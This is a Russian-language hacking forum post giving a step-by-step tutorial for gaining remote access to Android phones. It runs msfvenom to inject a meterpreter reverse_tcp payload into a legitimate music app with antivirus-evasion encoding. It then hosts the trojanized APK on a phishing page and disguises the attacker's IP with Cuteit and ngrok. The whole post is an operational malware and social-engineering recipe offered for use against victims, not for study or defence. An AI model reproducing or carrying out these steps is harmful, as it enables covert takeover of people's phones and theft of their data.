Получаем доступ к андроиду через зараженный APK
Life-Hack [Жизнь-Взлом]/ХакингДля начала нам необходимо будет скачать какой нибудь APK файл не более 5 мб, для этого идём на 4PDA ищем там что нибудь подходящее и качаем, я использую софт для загрузки музыки из вк.
Теперь открываем терминал и прописываем:
msfvenom -x '/директория где находится файл который мы будем заражать/DownloadMusic-1.5.apk' -p android/meterpreter/reverse_tcp LHOST=(ip вашего компа) LPORT=8080 -e x86/shikata_ga_nai -i 10 -o название итога.apk
-x - использовать такой то файл
-p - прилепить пейлоад
-o - назвать получившийся файл так-то
-e - зашифровать от обнаружения антивирусами
-i - количество "слоёв" шифрования
Жмём Enter и ждем когда веном либо выдаст ошибку либо скомпилирует файл.
Если выдает ошибку обновляем версию APKtool. Если не помогло ищем другую АПкашку для заражения. пишите если будут ошибки.
Теперь используя фишинг и СИ сделаем простенькую страничку для нашего софта.
Страничку можно создать используя конфигураторы сайтов либо использовать исходник приложеный ниже. Если вы используйте конфигуратор то знайте что он прилепит к ней вагон ненужного кода и прочий мусор.
Исходник ( Облако Mail )
pass - social_engineering
Содержимое папки Social по адресу /var/www/html (APK который мы заразили помещаем туда же)
Если не отображается картинка то необходимо предоставить доступ пользователю для чтения и записи в папке www.
Открываем файл index.html при помощи текстового редактора и исправляем все надписи на нужные вам, в часности <a href="forgo.apk">Установить</a>
forgo меняем на название вашего файла.
В терминале пишем
sudo systemctl start apache2
Как всё запустится открываем браузер, вводим в адресную строку свой ИП.
Для того что-бы наш ИП стал похож на веб адресс нам понадобится программа Cuteit которую мы скачаем с гитхаба
https://github.com/D4Vinci/Cuteit.git
там можно тупо следовать инструкции из файла readme
переходим в папку с кутитом через терминал и прописываем комманду
python ./Cuteit.py ваш ИП например 123.15.46.54
Получаем такую картину:
Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер.
Но в адресной строке в тот же момент появляется палево в виде нашего ИП.
Это мы победим при помощи Ngrok.
Прём по ссылке:
Качаем, регистрируемся и следуя инструкции добавляем ключи, иначе не будет работать как нужно.
Когда всё готово через терминал переходим в папку с Нгроком и прописываем
sudo ./ngrok http 80
Наши рабочие ссылки в строке Forwarding
Готово.
